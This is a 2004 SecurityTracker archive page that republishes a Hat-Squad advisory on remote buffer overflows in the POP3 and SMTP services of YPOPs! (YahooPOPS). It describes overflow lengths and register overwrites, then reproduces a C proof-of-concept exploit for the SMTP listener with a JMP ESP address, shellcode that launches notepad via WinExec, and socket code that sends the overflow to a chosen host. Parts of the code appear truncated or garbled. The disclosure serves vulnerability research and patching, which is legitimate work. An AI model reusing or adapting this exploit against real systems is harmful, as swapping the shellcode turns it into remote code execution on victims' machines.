Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (E-mail Server)  >   YPOPs! Vendors:
YPOPs! Buffer Overflows Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1011426
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 27 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.4 - 0.6
Description:   Hat-Squad Security Team reported buffer overflow vulnerabilities in YPOPs! A remote user can execute arbitrary code on the target system.

It is reported that a remote user can trigger buffer overflows in the POP3 and SMTP services.

A remote user can supply a POP3 USER command with a parameter that is greater than 180 bytes to trigger the overflow. A demonstration exploit request that will cause the target service to crash is provided:


A remote user can supply an SMTP message that is greater than 504 bytes to trigger the overflow. A demonstration exploit string is provided:

[504xA] [BBBB]

The SMTP service is not enabled by default.

The vendor was notified on September 24, 2004, without response.

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Oct 12 2004 (Exploit Code is Available) YPOPs! Buffer Overflows Let Remote Users Execute Arbitrary Code
class101 has provided some demonstration exploit code.

 Source Message Contents

Subject:  Hat-Squad Advisory: Remote Buffer overflow Vulnerability in YahooPOPS

Hat-Squad Advisory: Remote Buffer overflow Vulnerability in YahooPOPS
September 22, 2004

Product: YahooPOPS!
Vendor URL:
Version: YahooPOPS v0.4 up to v0.6
Vulnerability: Remote Buffer overflows
Release Date: 27 September 2004

Vendor Status:
Informed on 24 September 2004
Response: no response

YahooPOPs! Is an application that provides POP3 access to Yahoo! Mail. It is
available on the Windows, Linux, Solaris and Mac platforms. This application
emulates a POP3 & SMTP server. It also enables popular email clients like
Outlook, Netscape, Eudora, Mozilla, etc., to download email from Yahoo!
accounts. The Latest version of this Program is 0.6 and released in 23 May 2004
until now over 120000 users download this program.

Both POP3 and SMTP services have buffer overflow vulnerabilities. The Remote
Attacker can send specific Request to these services to cause a Stack based
buffer overflow which could allow a remote attacker to execute arbitrary code
or just simply crash the service on a vulnerable system.


A YahooPOPS 0.x has the Local SMTP and POP3 engines to send and receive emails.
SMTP service Dose not Enable By default. Users can enable SMTP by Software

A POP3 USER request with more than 180 bytes will start to corrupt the heap.
POP3 request (Dos Attack):

Telnet localhost 110
+OK POP3 YahooPOPs! Proxy ready

As a result EAX and ECX will be overwritten.

SMTP request:
Sending a request with more than 504 bytes will overwrite ESP and cause a stack
based overflow.

Telnet localhost 25
220 YahooPOPs! Simple Mail Transfer Service Ready
[504xA] [BBBB]

As a result The EIP registers will be overwritten.

Proof of concept demo exploit for YPOP! SMTP listener:

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib,"wsock32.lib")

int main(int argc, char *argv[])
static char overflow[1024];

char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll
char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3";

/*- harmless code (tnx to snooq) , will open  notepad on the remote machine */
char code[]= "\x33\xc0"	// xor eax, eax	 slight modification to move esp up
 "\xb0\xf0"		// mov al, 0f0h
 "\x2b\xe0"		// sub esp,eax
 "\x83\xE4\xF0"	// and esp, 0FFFFFFF0h
 "\x55" // push ebp
 "\x8b\xec" // mov ebp, esp
 "\x33\xf6" // xor esi, esi
 "\x56" // push esi
 "\x68\x2e\x65\x78\x65" // push 'exe.'
 "\x68\x65\x70\x61\x64" // push 'dape'
 "\x68\x90\x6e\x6f\x74" // push 'ton'
 "\x46" // inc esi
 "\x56" // push esi
 "\x8d\x7d\xf1" // lea edi, [ebp-0xf]
 "\x57" // push edi
 "\xb8\x35\xfd\xe6\x77" // mov eax,XXXX -> WinExec()win2k(SP4)=0x7c4e9c1d
 "\xff\xd0" // call eax
 "\x4e" // dec esi
 "\x56" // push esi
 "\xb8\xfd\x98\xe7\x77" // mov eax,YYYY ->ExitProcess()win2k(SP4)0x7c4ee01a
 "\xff\xd0"; // call eax

   WSADATA wsaData;

   struct hostent *hp;
   struct sockaddr_in sockin;
   char buf[300], *check;
   int sockfd, bytes;
   int plen,i;
   char *hostname;
   unsigned short port;

  if (argc <= 1)
	  printf("YPOPs! SMTP Overflow\n");
	  printf("By: Behrang Fouladi(\n\n");
      printf("Usage: %s [hostname] [port]\n", argv[0]);
      printf("default port is 25 \n");


   printf("YPOPs! SMTP Overflow\n");
   printf("By: Behrang Fouladi(\n\n");

   hostname = argv[1];
   if (argv[2]) port = atoi(argv[2]);
   else port = atoi("25");

   if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
      fprintf(stderr, "Error setting up with WinSock v1.1\n");

   hp = gethostbyname(hostname);
   if (hp == NULL)
      printf("ERROR: Uknown host %s\n", hostname);

   sockin.sin_family = hp->h_addrtype;
   sockin.sin_port = htons(port);
   sockin.sin_addr = *((struct in_addr *)hp->h_addr);

   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
      printf("ERROR: Socket Error\n");

   if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
      printf("ERROR: Connect Error\n");

   printf("Connected to [%s] on port [%d], sending overflow....\n",
          hostname, port);

   if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
      printf("ERROR: Recv Error\n");

   /* wait for SMTP service welcome*/
   buf[bytes] = '\0';
   check = strstr(buf, "220");
   if (check == NULL)
      printf("ERROR: NO  response from SMTP service\n");


   for (i=0; i<plen;i++){strcat(overflow,"\x90");}


   if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
      printf("ERROR: Send Error\n");

   printf("Exploit Sent.\n");

   return 0;


Vendor response: no response


This vulnerability has been discovered by Nima Majidi

The Original advisory could be found at:

Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, LLC